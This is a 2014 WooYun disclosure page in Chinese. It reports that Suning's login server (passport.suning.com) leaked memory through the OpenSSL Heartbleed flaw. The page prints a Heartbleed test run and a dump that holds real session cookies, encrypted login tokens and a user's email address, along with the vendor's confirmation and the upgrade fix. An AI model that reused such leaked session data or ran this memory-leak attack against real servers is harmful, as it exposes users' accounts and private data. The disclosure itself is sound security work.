当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055950

漏洞标题:苏宁易购主站运维不当导致可获取服务器敏感信息

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: MeirLin

提交时间:2014-04-08 17:54

修复时间:2014-05-23 17:55

公开时间:2014-05-23 17:55

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-08: 细节已通知厂商并且等待厂商处理中
2014-04-09: 厂商已经确认,细节仅向厂商公开
2014-04-19: 细节向核心白帽子及相关领域专家公开
2014-04-29: 细节向普通白帽子公开
2014-05-09: 细节向实习白帽子公开
2014-05-23: 细节向公众公开

简要描述:

苏宁易购主站运维不当导致可以登录随机用户并且获取服务器敏感信息

详细说明:

https://passport.suning.com


1.png


Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 3559
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
.@....SC[...r....+..H...9........w.3....f.....".!.9.8.........5.
............................3.2.....E.D...../...A...............
..................I...........4.2...............................
....................#.......31 (KHTML, like Gecko));dv(ZP900S Bu
ild/IMM76D);pr(UCBrowser/9.3.0.321);ov(Android 4.0.4);pi(540*960
);ss(540*960);up(U3/0.8.0);er(U);bt(UM);pm(1);bv(1);nm(0);im(0);
sr(0);nt(1);..Referer: https://m.suning.com/emall/SNMWLogonView?
catalogId=10051&storeId=10052&krypto=jH%2BX7iif8nPNG7HOz2SMdJVSD
hxbo7s2BHmi3q0tE2x61VDNMf05R%2BxZlUW9orIhD7h%2F%2BzVGOV5a%0Ap6B9
Oum0psvB3jQ6jFoOihj5p15IfGcSRafMfcisA09gvSpkbUK4LgdQXrFwRbKzgPp8
xl0S0y1C%0AJHkOLl7%2FYQo2BNW2UjhOrWWUeuGuYM74jazmYQE%2BlBaamCJV2
vC67gkPLSkQ0WYa1uOEqHKE3mpk%0AHnHst9dbcLWfe06OEInJoHNpDeV1lRB772
d9pC02KvEV9550T6O%2FKjM7%2B4HV%2BTlJZOP%2BjbAHr6Jh%0AS%2ByeAhNU%
2BKKyeShSYwaERB5MqkoCIHrnsaOSd78owxqsUpWEsXzK5982IkCvrC3zFre2TGR
LSZHb%0ApAxpdb%2Bogio15cNE3SxbzFsCQNf3mi34SUEn%2BG0O7OdoBUShBxrx
dzme5pf%2BgoSSiLgcTtuqBcbA%0AlFxiGHubpcL%2BzCngI8dCUGMLFgOFfJUT%
2BYpHgdTY8a62BdOy4HwiQAV3tNI4H6G42uQ%3D&ddkey=https:Logon..Accep
t-Encoding: gzip..User-Agent: Mozilla/5.0 (Linux; U; Android 4.0
.4; zh-CN; ZP900S Build/IMM76D) AppleWebKit/534.31 (KHTML, like
Gecko) UCBrowser/9.3.0.321 U3/0.8.0 Mobile Safari/534.31..isAjax
Request: 1..Accept: application/json, text/javascript, */*; q=0.
01..Connection: keep-alive.......~.AHC-..,....ning.com/emall/SNM
WLogonView%3FcatalogId%3D10051%26storeId%3D10052%26krypto%3DjH%2
52BX7iif8nPNG7HOz2SMdJVSDhxbo7s2BHmi3q0tE2x61VDNMf05R%252BxZlUW9
orIhD7h%252F%252BzVGOV5a%250Ap6B9Oum0psvB3jQ6jFoOihj5p15IfGcSRaf
MfcisA09gvSpkbUK4LgdQXrFwRbKzgPp8xl0S0y1C%250AJHkOLl7%252FYQo2BN
W2UjhOrWWUeuGuYM74jazmYQE%252BlBaamCJV2vC67gkPLSkQ0WYa1uOEqHKE3m
pk%250AHnHst9dbcLWfe06OEInJoHNpDeV1lRB772d9pC02KvEV9550T6O%252FK
jM7%252B4HV%252BTlJZOP%252BjbAHr6Jh%250AS%252ByeAhNU%252BKKyeShS
YwaERB5MqkoCIHrnsaOSd78owxqsUpWEsXzK5982IkCvrC3zFre2TGRLSZHb%250
ApAxpdb%252Bogio15cNE3SxbzFsCQNf3mi34SUEnLLGK97g%252BKGYpqrD2QkR
bSaYosuUiD%252FYvwmMJiWRC%250A7gGZ7GqLr9KVOV7wMMGx51tIEIovTOObvp
V^m..+.'..F....*2C822%29%28233%2C973%29%28undefined%2Cundefined%
29%280%2C0%29%28undefined%2Cundefined%29%280%2C0%29%28undefined%
2Cundefined%29%280%2C0%29%28286%2C1016%29%28622%2C846%29; WC_USE
RACTIVITY_42167480840=42167480840%2c10052%2c0%2cnull%2c139695011
3713%2c1396957929635%2cnull%2cnull%2cnull%2cnull%2cRwQIfr6JwV58J
U6yvO9k5VLVYXVEuc%2bDmq5Fjc6K3VNMTn4%2fRjISR3kC%2bfnhC6kvBMLxv2L
dyZMc%0a4AR5IZgNeu%2b772rZlI%2f8sS4aCIiRurJTKJO761Zh63w9aqmp%2fM
AkX7Hc%2b2SrdlEjnlrR2wkdwhEg%0a6hgeXCHr5DT6qcVCBIKY8yw2cb09jQ%3d
%3d.....gh..:...W...1m..jj......est=a; abtestN=c; firstAccess=ye
s; smhst=4352764a16812901a3965144a18803215a16812905; _snma=1%7C1
38958281362275702%7C1389582813622%7C1396940751976%7C139694077367
1%7C548%7C173; _snmp=139694075285671452; _snmb=13969400395312338
4%7C1396940773687%7C1396940773680%7C16; __utma=1.1600380945.1389
582814.1396927805.1396940040.150; __utmc=1; __utmz=1.1396940040.
150.93.utmcsr=product.suning.com|utmccn=(referral)|utmcmd=referr
al|utmcct=/snupgbpv_10052_10051_18802726_113110_.html; __utmv=1.
buyer; _snmz=139694077851029170%7C%28505%2C1127%29; idsLoginUser
IdLastTime=10823559%40qq.com; theme=default.......D5.....v!..>Nr
sZtgqrHGojMLb2gOJuZwZRz8A%3d%3d...../..*.....EG.b...............

漏洞证明:

1.png

修复方案:

升级

版权声明:转载请注明来源 MeirLin@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2014-04-09 09:17

厂商回复:

已经确认

最新状态:

暂无


漏洞评价:

评论

  1. 2014-04-09 10:03 | MeirLin ( 实习白帽子 | Rank:96 漏洞数:30 | 号借人)

    @江苏苏宁易购电子商务有限公司 审核通过了两次,然后那个已确认的洞好像被管理误删了 QAQ